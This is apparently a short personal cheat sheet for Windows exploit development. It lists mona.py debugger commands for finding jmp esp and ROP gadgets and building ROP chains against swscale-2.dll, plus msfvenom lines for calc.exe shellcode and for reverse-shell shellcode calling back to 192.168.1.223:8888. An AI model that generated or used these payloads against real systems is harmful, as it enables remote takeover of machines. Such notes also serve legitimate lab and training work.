-
set working folder:
!mona config -set workingfolder c:\logs\%p -
find instruction (i.e. "jmp esp") using mona:
!mona find -type instr -s "jmp esp" -
find in module, excluding bad chars
!mona find -type instr -s "retn" -m swscale-2.dll -cpb '\x00\x5c\x40\x0d\x0a' -
find with wildcards
!mona findwild -s "push r32#*#pop eax#inc eax#*#retn" -
calculate addresses offset
!mona offset -a1 <end address> -a2 <start address> -
find stack-pivoting gadgets
!mona stackpivot -distance 3212 -cpb '\x00\x5c\x40\x0d\x0a' -
generate rop-chains (single/multiple modules)
!mona rop -m swscale-2.dll -cpb '\x00\x5c\x40\x0d\x0a'!mona rop -m "module1, module2" -cpb '\x00\x5c\x40\x0d\x0a'
-
shellcode generation using msfvenom (reverse shell)
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.223 LPORT=8888 -f py -b "\x00\x0a\x0d\x20\x26\x2a\xd9\x74\x24\xf4" -
shellcode generation using msfvenom (calc.exe)
msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f python --bad-chars '\x00\x5c\x40\x0d\x0a'